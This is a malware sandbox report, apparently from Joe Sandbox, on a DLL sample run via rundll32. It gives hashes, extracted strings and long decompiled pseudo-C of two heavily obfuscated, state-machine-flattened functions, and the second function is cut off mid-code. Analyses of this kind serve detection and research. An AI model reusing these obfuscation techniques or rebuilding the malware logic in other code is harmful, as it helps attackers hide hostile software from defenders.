Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: *>$,$-C$2($9\/!$B/$Jul$Xdoo$Xdoo$Y$c@$lf$mR$u$w={Q$~'
API String ID: 0-1002547484
Opcode ID: adedfeae8c5d915a0a1bf16399041e1b234d3be2b24265e5e5cffc66a31987de
Instruction ID: a10887d5309f37cbec44b9bf97499b1ae25e94bdc5a0cbde92779140dd3b492f
Opcode Fuzzy Hash: adedfeae8c5d915a0a1bf16399041e1b234d3be2b24265e5e5cffc66a31987de
Instruction Fuzzy Hash: C832E1715083809FE3B8CF61C849A9BBBE1FBC5744F10891DE2DA96260D7B58949CF53

Uniqueness

Uniqueness Score: -1.00%

Function 10011259, Relevance: 19.2, Strings: 15, Instructions: 407
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E10011259(intOrPtr* __ecx, intOrPtr __edx, intOrPtr* _a4) {
				char _v64;
				char _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr* _v148;
				char _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				unsigned int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _t456;
				signed int _t460;
				intOrPtr _t483;
				intOrPtr* _t486;
				void* _t490;
				signed int _t533;
				signed int _t534;
				signed int _t535;
				signed int _t536;
				signed int _t537;
				signed int _t538;
				signed int _t539;
				signed int _t540;
				signed int _t541;
				intOrPtr _t542;
				void* _t543;
				intOrPtr* _t550;
				signed int* _t551;
				signed int* _t552;

				_t486 = __ecx;
				_t551 =  &_v328;
				_v144 = __edx;
				_v148 = __ecx;
				_v140 = 0x789b9f;
				_v136 = 0;
				_v132 = 0;
				_v252 = 0x9c45;
				_v252 = _v252 >> 0xa;
				_v252 = _v252 + 0xdca;
				_v252 = _v252 ^ 0x000071fb;
				_v324 = 0x63fc;
				_v324 = _v324 | 0x88cdde90;
				_v324 = _v324 + 0x73bf;
				_v324 = _v324 + 0xfe3;
				_v324 = _v324 ^ 0x88cef902;
				_v292 = 0x54b2;
				_v292 = _v292 >> 0x10;
				_v292 = _v292 | 0xe7a4c23a;
				_v292 = _v292 ^ 0x9f79697b;
				_v292 = _v292 ^ 0x78ddcaec;
				_v192 = 0xd97d;
				_v192 = _v192 * 0x68;
				_t543 = 0x2ff3c5f1;
				_v192 = _v192 ^ 0x005860dd;
				_v276 = 0xcf22;
				_t533 = 0x30;
				_v276 = _v276 * 0x64;
				_v276 = _v276 * 0x23;
				_v276 = _v276 / _t533;
				_v276 = _v276 ^ 0x003aac15;
				_v200 = 0xe99;
				_v200 = _v200 * 0x77;
				_v200 = _v200 ^ 0x0006edd2;
				_v316 = 0x8b49;
				_v316 = _v316 << 5;
				_v316 = _v316 | 0x25c31d21;
				_v316 = _v316 * 0x76;
				_v316 = _v316 ^ 0x6f7b91fa;
				_v300 = 0x416c;
				_v300 = _v300 ^ 0x0db1fc9b;
				_v300 = _v300 | 0xf73ffbe5;
				_v300 = _v300 ^ 0xffbfa19e;
				_v232 = 0x7c56;
				_v232 = _v232 << 7;
				_v232 = _v232 | 0x65dc48c8;
				_v232 = _v232 ^ 0x65fe4a93;
				_v284 = 0xa4ad;
				_v284 = _v284 + 0x3b34;
				_v284 = _v284 | 0x46e5bf9e;
				_v284 = _v284 + 0xaed;
				_v284 = _v284 ^ 0x46e62dba;
				_v308 = 0x51a5;
				_v308 = _v308 + 0xffff7093;
				_v308 = _v308 << 7;
				_v308 = _v308 + 0x4d44;
				_v308 = _v308 ^ 0xffe14d92;
				_v216 = 0x9cb5;
				_v216 = _v216 + 0xa1ba;
				_v216 = _v216 ^ 0x7c221f2f;
				_v216 = _v216 ^ 0x7c23012a;
				_v248 = 0xb7b7;
				_v248 = _v248 + 0xffff0c03;
				_v248 = _v248 ^ 0x49401faf;
				_v248 = _v248 ^ 0xb6bfcfdf;
				_v268 = 0xf946;
				_t534 = 0x23;
				_v268 = _v268 / _t534;
				_v268 = _v268 ^ 0x2bbfee68;
				_v268 = _v268 << 0xa;
				_v268 = _v268 ^ 0xffa5a976;
				_v240 = 0x34aa;
				_v240 = _v240 ^ 0x898fa139;
				_t535 = 0x66;
				_v240 = _v240 * 0xf;
				_v240 = _v240 ^ 0x0f69dc7c;
				_v328 = 0xae94;
				_v328 = _v328 >> 0xd;
				_v328 = _v328 ^ 0x36fbf0c7;
				_v328 = _v328 | 0xa53cbb78;
				_v328 = _v328 ^ 0xb7ffdef1;
				_v208 = 0xbc8e;
				_v208 = _v208 + 0x75c8;
				_v208 = _v208 ^ 0x00011f72;
				_v160 = 0x504a;
				_v160 = _v160 ^ 0xbc1e1624;
				_v160 = _v160 ^ 0xbc1e3fa8;
				_v312 = 0xe1b9;
				_v312 = _v312 ^ 0x616bd030;
				_v312 = _v312 * 0x17;
				_v312 = _v312 << 3;
				_v312 = _v312 ^ 0x050b8b93;
				_v172 = 0x434;
				_v172 = _v172 >> 6;
				_v172 = _v172 ^ 0x00007db4;
				_v320 = 0x7186;
				_v320 = _v320 / _t535;
				_v320 = _v320 ^ 0x70a7bdd0;
				_v320 = _v320 + 0xffffa3e3;
				_v320 = _v320 ^ 0x70a70491;
				_v224 = 0x741a;
				_v224 = _v224 << 0xd;
				_v224 = _v224 + 0xffff57ca;
				_v224 = _v224 ^ 0x0e82cf00;
				_v288 = 0xd06d;
				_v288 = _v288 | 0x7ffffd7f;
				_v288 = _v288 ^ 0x7fffa657;
				_v296 = 0x1ceb;
				_v296 = _v296 + 0x45c4;
				_v296 = _v296 << 0xc;
				_t536 = 0x1f;
				_v296 = _v296 * 0x49;
				_v296 = _v296 ^ 0xc23e624a;
				_v164 = 0xac99;
				_v164 = _v164 + 0xffff7636;
				_v164 = _v164 ^ 0x000007a2;
				_v304 = 0xffa9;
				_v304 = _v304 << 0x10;
				_v304 = _v304 / _t536;
				_t537 = 0x2f;
				_v304 = _v304 / _t537;
				_v304 = _v304 ^ 0x002cccb4;
				_v184 = 0x3467;
				_v184 = _v184 ^ 0xc277e171;
				_v184 = _v184 ^ 0xc277d8b3;
				_v176 = 0xda70;
				_v176 = _v176 + 0xffff1f30;
				_v176 = _v176 ^ 0xffffb27f;
				_v260 = 0xae02;
				_v260 = _v260 << 0xc;
				_v260 = _v260 * 0x50;
				_v260 = _v260 ^ 0x660a4938;
				_v256 = 0x63fd;
				_v256 = _v256 + 0x38f;
				_v256 = _v256 >> 0xc;
				_v256 = _v256 ^ 0x000034b4;
				_v280 = 0x1bf8;
				_v280 = _v280 | 0x50a879c7;
				_v280 = _v280 ^ 0xa62f7448;
				_v280 = _v280 << 5;
				_v280 = _v280 ^ 0xd0e1eb8a;
				_v244 = 0x35;
				_t538 = 0x63;
				_v244 = _v244 * 0x70;
				_v244 = _v244 << 4;
				_v244 = _v244 ^ 0x000178e8;
				_v156 = 0x4bd8;
				_v156 = _v156 >> 0xa;
				_v156 = _v156 ^ 0x00000c69;
				_v272 = 0xcefd;
				_v272 = _v272 << 4;
				_v272 = _v272 * 0x45;
				_v272 = _v272 + 0xffffd708;
				_v272 = _v272 ^ 0x037c36fb;
				_v196 = 0x7f21;
				_v196 = _v196 * 0x5e;
				_v196 = _v196 ^ 0x002ea2e9;
				_v204 = 0xcb9f;
				_v204 = _v204 / _t538;
				_v204 = _v204 ^ 0x00000b3c;
				_v168 = 0x3be2;
				_v168 = _v168 + 0xffffc6dc;
				_v168 = _v168 ^ 0x000064f9;
				_v264 = 0xf83;
				_v264 = _v264 >> 0xa;
				_v264 = _v264 + 0xacf6;
				_t539 = 0x33;
				_v264 = _v264 / _t539;
				_v264 = _v264 ^ 0x00007950;
				_v236 = 0xe76d;
				_t540 = 0x54;
				_v236 = _v236 / _t540;
				_t541 = 0x1b;
				_v236 = _v236 * 0x11;
				_v236 = _v236 ^ 0x00002164;
				_v188 = 0xc970;
				_v188 = _v188 / _t541;
				_v188 = _v188 ^ 0x00007c4d;
				_v212 = 0xdba3;
				_v212 = _v212 ^ 0x3f6919ac;
				_v212 = _v212 ^ 0x3cbdc81e;
				_v212 = _v212 ^ 0x03d448c8;
				_v220 = 0x9876;
				_v220 = _v220 >> 5;
				_v220 = _v220 * 0x3f;
				_v220 = _v220 ^ 0x00015d8d;
				_v180 = 0xda76;
				_v180 = _v180 + 0xffffee50;
				_v180 = _v180 ^ 0x0000c932;
				_v228 = 0x4db6;
				_v228 = _v228 >> 0xf;
				_v228 = _v228 >> 0xc;
				_v228 = _v228 ^ 0x00001ce0;
				_t550 = _a4;
				_t542 = _v144;
				_t483 = _v144;
				while(_t543 != 0xe3f9543) {
					if(_t543 == 0x265bf3eb) {
						_t456 = E10015A17(_v276,  &_v152, _v200, _v316);
						_pop(_t490);
						_push(_v308);
						_t384 = (_t456 & 0x0000000f) + 4; // 0x4
						E10014047(_t384, _v300, _v232, _t490, _v284,  &_v152,  &_v128);
						 *((char*)(_t551 + (_t456 & 0x0000000f) + 0xf8)) = 0;
						_t460 = E10015A17(_v216,  &_v152, _v248, _v268);
						_t552 =  &(_t551[8]);
						_t547 = _t460 & 0x0000000f;
						_push(_v160);
						_t397 = _t547 + 4; // 0x4
						E10014047(_t397, _v240, _v328, _v216, _v208,  &_v152,  &_v64);
						_push(_v320);
						 *((char*)(_t552 + (_t460 & 0x0000000f) + 0x138)) = 0;
						_push(_v172);
						_t542 = _t542 + E1001E14D(_v224, __eflags, _v288, _v296,  &_v64, E10012164(0x10001534, _v312, __eflags), _v164, _v304, _v144,  &_v128, _v184, _t542);
						E1001C5F7(_v176, _v260, _v256, _v280, _t464);
						_t551 =  &(_t552[0x15]);
						_t543 = 0xe3f9543;
						L10:
						_t486 = _v148;
						continue;
					}
					if(_t543 == 0x2b2ac207) {
						_push(_t486);
						_t542 = E100157E8(_a4);
						 *_t550 = _t542;
						__eflags = _t542;
						if(__eflags == 0) {
							L16:
							__eflags = 0;
							return 0;
						}
						_t543 = 0x265bf3eb;
						_t483 = _a4 + _t542;
						goto L10;
					}
					if(_t543 == 0x2ff3c5f1) {
						_v152 = E10017B6B();
						_t543 = 0x30aa390f;
						goto L10;
					}
					if(_t543 == 0x30aa390f) {
						_t543 = 0x2b2ac207;
						_a4 =  *((intOrPtr*)(_t486 + 4)) + 0x1000;
						continue;
					}
					_t561 = _t543 - 0x3a71eb6b;
					if(_t543 != 0x3a71eb6b) {
						L15:
						__eflags = _t543 - 0x15497eaf;
						if(__eflags != 0) {
							continue;
						}
						goto L16;
					}
					_push(_v168);
					_push(_v204);
					E1000D901(_v236, _t561, E10012164(0x10001474, _v196, _t561), _t542, _t483 - _t542, _v144, _v188);
					E1001C5F7(_v212, _v220, _v180, _v228, _t478);
					return 1;
				}
				E10009970(_v244,  *_t486, _v156, _t542,  *((intOrPtr*)(_t486 + 4)), _v272);
				_t486 = _v148;
				_t551 =  &(_t551[4]);
				_t543 = 0x3a71eb6b;
				_t542 = _t542 +  *((intOrPtr*)(_t486 + 4));
				__eflags = _t542;
				goto L15;
			}

0x10011259
0x10011259
0x10011263
0x1001126a
0x10011271
0x1001127e
0x10011285
0x1001128c
0x10011294
0x10011299
0x100112a1
0x100112a9
0x100112b1
0x100112b9
0x100112c1
0x100112c9
0x100112d1
0x100112d9
0x100112de
0x100112e6
0x100112ee
0x100112f6
0x10011309
0x10011310
0x10011315
0x10011320
0x10011331
0x10011332
0x1001133d
0x10011347
0x1001134b
0x10011353
0x10011366
0x1001136d
0x10011378
0x10011380
0x10011385
0x10011392
0x10011396
0x1001139e
0x100113a6
0x100113ae
0x100113b6
0x100113be
0x100113c6
0x100113cb
0x100113d3
0x100113db
0x100113e3
0x100113eb
0x100113f3
0x100113fb
0x10011403
0x1001140b
0x10011413
0x10011418
0x10011420
0x10011428
0x10011433
0x1001143e
0x10011449
0x10011454
0x1001145c
0x10011464
0x1001146c
0x10011476
0x10011482
0x10011487
0x1001148d
0x10011495
0x1001149a
0x100114a2
0x100114aa
0x100114b7
0x100114ba
0x100114be
0x100114c6
0x100114ce
0x100114d3
0x100114db
0x100114e3
0x100114eb
0x100114f6
0x10011501
0x1001150c
0x10011517
0x10011522
0x1001152d
0x10011535
0x10011542
0x10011546
0x1001154b
0x10011553
0x1001155e
0x10011566
0x10011571
0x10011581
0x10011585
0x1001158d
0x10011595
0x1001159d
0x100115a5
0x100115aa
0x100115b2
0x100115ba
0x100115c2
0x100115ca
0x100115d2
0x100115da
0x100115e2
0x100115ec
0x100115ef
0x100115f3
0x100115fb
0x10011606
0x10011611
0x1001161c
0x10011624
0x10011631
0x10011639
0x1001163c
0x10011640
0x10011648
0x10011653
0x1001165e
0x10011669
0x10011674
0x1001167f
0x1001168a
0x10011692
0x1001169c
0x100116a2
0x100116aa
0x100116b2
0x100116ba
0x100116bf
0x100116c7
0x100116cf
0x100116d7
0x100116df
0x100116e4
0x100116ec
0x100116fb
0x100116fe
0x10011702
0x10011707
0x1001170f
0x1001171a
0x10011722
0x1001172d
0x10011735
0x1001173f
0x10011743
0x1001174b
0x10011753
0x10011766
0x1001176d
0x10011778
0x1001178e
0x10011795
0x100117a0
0x100117ab
0x100117b6
0x100117c1
0x100117c9
0x100117ce
0x100117da
0x100117df
0x100117e5
0x100117ed
0x100117f9
0x100117fe
0x10011809
0x1001180a
0x1001180e
0x10011816
0x1001182a
0x10011831
0x1001183c
0x10011847
0x10011852
0x1001185d
0x10011868
0x10011870
0x1001187a
0x1001187e
0x10011886
0x10011891
0x1001189c
0x100118a7
0x100118af
0x100118b4
0x100118b9
0x100118c1
0x100118c8
0x100118cf
0x100118d6
0x100118e8
0x10011a06
0x10011a0c
0x10011a0d
0x10011a36
0x10011a39
0x10011a49
0x10011a5c
0x10011a61
0x10011a6d
0x10011a70
0x10011a93
0x10011a96
0x10011a9b
0x10011aa4
0x10011aac
0x10011b04
0x10011b1a
0x10011b1f
0x10011b22
0x100119b6
0x100119b6
0x00000000
0x100119b6
0x100118f4
0x100119cd
0x100119d6
0x100119d8
0x100119dc
0x100119de
0x10011b64
0x10011b64
0x00000000
0x10011b64
0x100119e7
0x100119ec
0x00000000
0x100119ec
0x10011900
0x100119aa
0x100119b1
0x00000000
0x100119b1
0x1001190c
0x1001198b
0x10011995
0x00000000
0x10011995
0x1001190e
0x10011914
0x10011b58
0x10011b58
0x10011b5e
0x00000000
0x00000000
0x00000000
0x10011b5e
0x1001191a
0x10011926
0x10011956
0x10011978
0x00000000
0x10011982
0x10011b41
0x10011b46
0x10011b4d
0x10011b50
0x10011b55
0x10011b55
0x00000000

Strings

JP, xrefs: 1001150C
4;, xrefs: 100113E3
m, xrefs: 100117ED
lA, xrefs: 1001139E
g4, xrefs: 10011648
V|, xrefs: 100113BE
DM, xrefs: 10011418
8If, xrefs: 100116A2
kq:, xrefs: 1001190E
kq:, xrefs: 10011B50
;, xrefs: 100117A0
M|, xrefs: 10011831
d!, xrefs: 1001180E
Py, xrefs: 100117E5
5, xrefs: 100116EC

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 4;$5$8If$DM$JP$M|$Py$V|$d!$g4$kq:$kq:$lA$m$;
API String ID: 0-568511501
Opcode ID: ffee52309dcb3b8a3776b9ae92b59ba598ef45fc93f80cf663b5faca067fc83c
Instruction ID: 7d87d4b9e6001df5490aca812dbbb1cc4364f445d9f358926f4f38338a9f55e9
Opcode Fuzzy Hash: ffee52309dcb3b8a3776b9ae92b59ba598ef45fc93f80cf663b5faca067fc83c
Instruction Fuzzy Hash: 4A2200715093809FE364CF25C98AA8BFBF1FBC5708F10891DE1999A2A0D7B59949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 10002628, Relevance: 16.6, Strings: 13, Instructions: 349
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E10002628(signed int __ecx, intOrPtr* __edx) {
				short* _t400;
				signed int _t408;
				signed int _t412;
				signed int _t413;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t417;
				signed int _t418;
				short _t457;
				void* _t460;
				intOrPtr* _t464;
				void* _t466;

				 *(_t466 + 0xa4) = 0x1cb5a8;
				 *(_t466 + 0xa8) = 0x505ffa;
				_t457 = 0;
				 *(_t466 + 0xb0) = __ecx;
				 *((intOrPtr*)(_t466 + 0xbc)) = 0;
				_t464 = __edx;
				 *(_t466 + 0x30) = 0x376c;
				 *(_t466 + 0x30) =  *(_t466 + 0x30) << 3;
				_t460 = 0xe980b9f;
				 *(_t466 + 0x30) =  *(_t466 + 0x30) + 0xffff79a1;
				 *(_t466 + 0x30) =  *(_t466 + 0x30) + 0x5a99;
				 *(_t466 + 0x30) =  *(_t466 + 0x30) ^ 0x00018f98;
				 *(_t466 + 0x7c) = 0xd2fb;
				 *(_t466 + 0x7c) =  *(_t466 + 0x7c) + 0xc9d;
				 *(_t466 + 0x7c) =  *(_t466 + 0x7c) ^ 0x0000df88;
				 *(_t466 + 0x50) = 0x1f52;
				 *(_t466 + 0x50) =  *(_t466 + 0x50) | 0x4d6b1b5a;
				 *(_t466 + 0x50) =  *(_t466 + 0x50) >> 7;
				 *(_t466 + 0x50) =  *(_t466 + 0x50) ^ 0x409ad63e;
				 *(_t466 + 0x64) = 0xb688;
				_t412 = 0x15;
				 *(_t466 + 0x68) =  *(_t466 + 0x64) / _t412;
				 *(_t466 + 0x68) =  *(_t466 + 0x68) ^ 0xfe7853c5;
				 *(_t466 + 0x68) =  *(_t466 + 0x68) ^ 0xfe7823fa;
				 *(_t466 + 0x14) = 0x1176;
				_t413 = 0x74;
				 *(_t466 + 0x14) =  *(_t466 + 0x14) * 0x26;
				 *(_t466 + 0x14) =  *(_t466 + 0x14) + 0xffff909d;
				 *(_t466 + 0x14) =  *(_t466 + 0x14) + 0xffffdc13;
				 *(_t466 + 0x14) =  *(_t466 + 0x14) ^ 0x000201fd;
				 *(_t466 + 0x94) = 0xba7a;
				 *(_t466 + 0x94) =  *(_t466 + 0x94) << 0xa;
				 *(_t466 + 0x94) =  *(_t466 + 0x94) ^ 0x02e990c5;
				 *(_t466 + 0x24) = 0xa3c4;
				 *(_t466 + 0x24) =  *(_t466 + 0x24) | 0x9ff723c2;
				 *(_t466 + 0x24) =  *(_t466 + 0x24) / _t413;
				 *(_t466 + 0x24) =  *(_t466 + 0x24) + 0x3928;
				 *(_t466 + 0x24) =  *(_t466 + 0x24) ^ 0x01616723;
				 *(_t466 + 0x1c) = 0x7213;
				 *(_t466 + 0x1c) =  *(_t466 + 0x1c) | 0x351e9b59;
				_t414 = 0x5f;
				 *(_t466 + 0x18) =  *(_t466 + 0x1c) * 0x1d;
				 *(_t466 + 0x18) =  *(_t466 + 0x18) >> 3;
				 *(_t466 + 0x18) =  *(_t466 + 0x18) ^ 0x00904fb7;
				 *(_t466 + 0x5c) = 0x297a;
				 *(_t466 + 0x5c) =  *(_t466 + 0x5c) | 0x66c43148;
				 *(_t466 + 0x5c) =  *(_t466 + 0x5c) + 0xbef6;
				 *(_t466 + 0x5c) =  *(_t466 + 0x5c) ^ 0x66c4e3a8;
				 *(_t466 + 0xa8) = 0xb108;
				 *(_t466 + 0xa8) =  *(_t466 + 0xa8) + 0xffffb23b;
				 *(_t466 + 0xa8) =  *(_t466 + 0xa8) ^ 0x00003984;
				 *(_t466 + 0x60) = 0x972c;
				 *(_t466 + 0x60) =  *(_t466 + 0x60) | 0x55a95463;
				 *(_t466 + 0x60) =  *(_t466 + 0x60) << 3;
				 *(_t466 + 0x60) =  *(_t466 + 0x60) ^ 0xad4eaf49;
				 *(_t466 + 0x38) = 0xedfb;
				 *(_t466 + 0x38) =  *(_t466 + 0x38) / _t414;
				 *(_t466 + 0x38) =  *(_t466 + 0x38) + 0xffffecb7;
				 *(_t466 + 0x38) =  *(_t466 + 0x38) << 0xe;
				 *(_t466 + 0x38) =  *(_t466 + 0x38) ^ 0xfbce5bfc;
				 *(_t466 + 0x44) = 0x5f66;
				 *(_t466 + 0x44) =  *(_t466 + 0x44) << 8;
				 *(_t466 + 0x44) =  *(_t466 + 0x44) * 0x4b;
				 *(_t466 + 0x44) =  *(_t466 + 0x44) ^ 0x1bf2eb8b;
				 *(_t466 + 0x74) = 0xc9a;
				 *(_t466 + 0x74) =  *(_t466 + 0x74) + 0x2510;
				 *(_t466 + 0x74) =  *(_t466 + 0x74) ^ 0x00001e79;
				 *(_t466 + 0x58) = 0xe86a;
				_t415 = 0x5c;
				 *(_t466 + 0x5c) =  *(_t466 + 0x58) / _t415;
				 *(_t466 + 0x5c) =  *(_t466 + 0x5c) + 0xffff7371;
				 *(_t466 + 0x5c) =  *(_t466 + 0x5c) ^ 0xffff2425;
				 *(_t466 + 0x84) = 0xcc82;
				 *(_t466 + 0x84) =  *(_t466 + 0x84) + 0xc6d3;
				 *(_t466 + 0x84) =  *(_t466 + 0x84) ^ 0x0001c52d;
				 *(_t466 + 0xb0) = 0x36af;
				_t408 = 0x79;
				 *(_t466 + 0xac) =  *(_t466 + 0xb0) / _t408;
				 *(_t466 + 0xac) =  *(_t466 + 0xac) ^ 0x00000e87;
				 *(_t466 + 0x4c) = 0x72c3;
				 *(_t466 + 0x4c) =  *(_t466 + 0x4c) + 0xfe00;
				 *(_t466 + 0x4c) =  *(_t466 + 0x4c) + 0xffffcf74;
				 *(_t466 + 0x4c) =  *(_t466 + 0x4c) ^ 0x00017982;
				 *(_t466 + 0x88) = 0xe5b8;
				 *(_t466 + 0x88) =  *(_t466 + 0x88) + 0xffff64c8;
				 *(_t466 + 0x88) =  *(_t466 + 0x88) ^ 0x00004835;
				 *(_t466 + 0x3c) = 0xe83b;
				 *(_t466 + 0x3c) =  *(_t466 + 0x3c) ^ 0x50645aeb;
				 *(_t466 + 0x3c) =  *(_t466 + 0x3c) << 4;
				 *(_t466 + 0x3c) =  *(_t466 + 0x3c) >> 0xe;
				 *(_t466 + 0x3c) =  *(_t466 + 0x3c) ^ 0x000050c9;
				 *(_t466 + 0x34) = 0x9196;
				 *(_t466 + 0x34) =  *(_t466 + 0x34) >> 9;
				 *(_t466 + 0x34) =  *(_t466 + 0x34) >> 5;
				 *(_t466 + 0x34) =  *(_t466 + 0x34) << 5;
				 *(_t466 + 0x34) =  *(_t466 + 0x34) ^ 0x00007a23;
				 *(_t466 + 0x24) = 0x47d0;
				 *(_t466 + 0x24) =  *(_t466 + 0x24) | 0x92809c60;
				 *(_t466 + 0x24) =  *(_t466 + 0x24) ^ 0x0aa14077;
				 *(_t466 + 0x24) =  *(_t466 + 0x24) >> 9;
				 *(_t466 + 0x24) =  *(_t466 + 0x24) ^ 0x004c1604;
				 *(_t466 + 0x54) = 0xa739;
				 *(_t466 + 0x54) =  *(_t466 + 0x54) ^ 0xf1b351c6;
				 *(_t466 + 0x54) =  *(_t466 + 0x54) ^ 0xf1b3adaf;
				 *(_t466 + 0x6c) = 0x41b6;
				 *(_t466 + 0x6c) =  *(_t466 + 0x6c) + 0x2b93;
				 *(_t466 + 0x6c) =  *(_t466 + 0x6c) >> 6;
				 *(_t466 + 0x6c) =  *(_t466 + 0x6c) ^ 0x000038f9;
				 *(_t466 + 0x94) = 0xf0c0;
				 *(_t466 + 0x94) =  *(_t466 + 0x94) * 0x45;
				 *(_t466 + 0x94) =  *(_t466 + 0x94) ^ 0x0040ff8e;
				 *(_t466 + 0x8c) = 0x53d0;
				 *(_t466 + 0x8c) =  *(_t466 + 0x8c) | 0x714ab1e7;
				 *(_t466 + 0x8c) =  *(_t466 + 0x8c) ^ 0x714af8de;
				 *(_t466 + 0x28) = 0xe7ca;
				 *(_t466 + 0x28) =  *(_t466 + 0x28) | 0x74901d91;
				 *(_t466 + 0x28) =  *(_t466 + 0x28) >> 2;
				 *(_t466 + 0x28) =  *(_t466 + 0x28) << 2;
				 *(_t466 + 0x28) =  *(_t466 + 0x28) ^ 0x7490bdaa;
				 *(_t466 + 0x84) = 0x4172;
				 *(_t466 + 0x84) =  *(_t466 + 0x84) * 0x69;
				 *(_t466 + 0x84) =  *(_t466 + 0x84) ^ 0x001ac2d4;
				 *(_t466 + 0x78) = 0xc4a2;
				 *(_t466 + 0x78) =  *(_t466 + 0x78) | 0xb1071ce6;
				 *(_t466 + 0x78) =  *(_t466 + 0x78) ^ 0xb107e3cc;
				 *(_t466 + 0x98) = 0xafb5;
				 *(_t466 + 0x98) =  *(_t466 + 0x98) >> 5;
				 *(_t466 + 0x98) =  *(_t466 + 0x98) ^ 0x000050c6;
				 *(_t466 + 0x48) = 0x5e6d;
				 *(_t466 + 0x48) =  *(_t466 + 0x48) + 0xffff30ef;
				 *(_t466 + 0x48) =  *(_t466 + 0x48) << 6;
				 *(_t466 + 0x48) =  *(_t466 + 0x48) ^ 0xffe3f79c;
				 *(_t466 + 0xa4) = 0xfcdb;
				 *(_t466 + 0xa4) =  *(_t466 + 0xa4) << 0xd;
				 *(_t466 + 0xa4) =  *(_t466 + 0xa4) ^ 0x1f9b008b;
				 *(_t466 + 0x1c) = 0x2d62;
				 *(_t466 + 0x1c) =  *(_t466 + 0x1c) >> 7;
				_t416 = 0x36;
				 *(_t466 + 0x1c) =  *(_t466 + 0x1c) / _t416;
				 *(_t466 + 0x1c) =  *(_t466 + 0x1c) + 0xffff17c7;
				 *(_t466 + 0x1c) =  *(_t466 + 0x1c) ^ 0xffff0d36;
				 *(_t466 + 0xa0) = 0xd9f3;
				 *(_t466 + 0xa0) =  *(_t466 + 0xa0) + 0x7ef3;
				 *(_t466 + 0xa0) =  *(_t466 + 0xa0) ^ 0x00014615;
				 *(_t466 + 0x2c) = 0x45e6;
				 *(_t466 + 0x2c) =  *(_t466 + 0x2c) | 0xb2517b85;
				 *(_t466 + 0x2c) =  *(_t466 + 0x2c) + 0xffff8485;
				_t417 = 0x47;
				 *(_t466 + 0x2c) =  *(_t466 + 0x2c) / _t417;
				 *(_t466 + 0x2c) =  *(_t466 + 0x2c) ^ 0x028281f3;
				 *(_t466 + 0x14) = 0x40cf;
				_t418 = 0x54;
				 *(_t466 + 0x14) =  *(_t466 + 0x14) / _t418;
				 *(_t466 + 0x14) =  *(_t466 + 0x14) >> 0xf;
				 *(_t466 + 0x14) =  *(_t466 + 0x14) + 0xffffcfbb;
				 *(_t466 + 0x14) =  *(_t466 + 0x14) ^ 0xffffd245;
				 *(_t466 + 0x70) = 0xec9;
				 *(_t466 + 0x70) =  *(_t466 + 0x70) | 0x66abf62f;
				 *(_t466 + 0x70) =  *(_t466 + 0x70) >> 2;
				 *(_t466 + 0x70) =  *(_t466 + 0x70) ^ 0x19aa8e93;
				 *(_t466 + 0x9c) = 0xb92f;
				 *(_t466 + 0x9c) =  *(_t466 + 0x9c) << 0xa;
				 *(_t466 + 0x9c) =  *(_t466 + 0x9c) ^ 0x02e4dd06;
				 *(_t466 + 0x40) = 0xf9b7;
				 *(_t466 + 0x40) =  *(_t466 + 0x40) ^ 0xd32ba56e;
				 *(_t466 + 0x40) =  *(_t466 + 0x40) + 0xffff6d4c;
				_t409 =  *(_t466 + 0xb0);
				 *(_t466 + 0x40) =  *(_t466 + 0x40) / _t408;
				 *(_t466 + 0x40) =  *(_t466 + 0x40) ^ 0x01bea26b;
				 *(_t466 + 0x68) = 0x7664;
				 *(_t466 + 0x68) =  *(_t466 + 0x68) >> 0xc;
				 *(_t466 + 0x68) =  *(_t466 + 0x68) + 0xffff8a59;
				 *(_t466 + 0x68) =  *(_t466 + 0x68) ^ 0xffff9898;
				do {
					while(_t460 != 0x4166320) {
						if(_t460 == 0x5d953cf) {
							E10018668( *(_t466 + 0x68),  *(_t466 + 0x40), __eflags,  *(_t466 + 0x48), _t466 + 0x2c8);
							_t460 = 0x2c6b1ef9;
							continue;
						} else {
							if(_t460 == 0xe980b9f) {
								_t460 = 0x273bc967;
								continue;
							} else {
								if(_t460 == 0x1c525ebd) {
									_t409 = E1000492A( *(_t466 + 0x60), 0,  *((intOrPtr*)(_t466 + 0xc0)),  *((intOrPtr*)(_t466 + 0xb4)),  *(_t466 + 0x4c),  *(_t466 + 0x60),  *(_t466 + 0x6c),  *(_t466 + 0x9c),  *(_t466 + 0x60),  *((intOrPtr*)(_t466 + 0x4e8)),  *(_t466 + 0x88),  *((intOrPtr*)(_t466 + 0x80)),  *(_t466 + 0x9c),  *(_t466 + 0x48));
									_t466 = _t466 + 0x30;
									__eflags = _t395 - 0xffffffff;
									if(__eflags != 0) {
										_t460 = 0x35123284;
										continue;
									}
								} else {
									if(_t460 == 0x273bc967) {
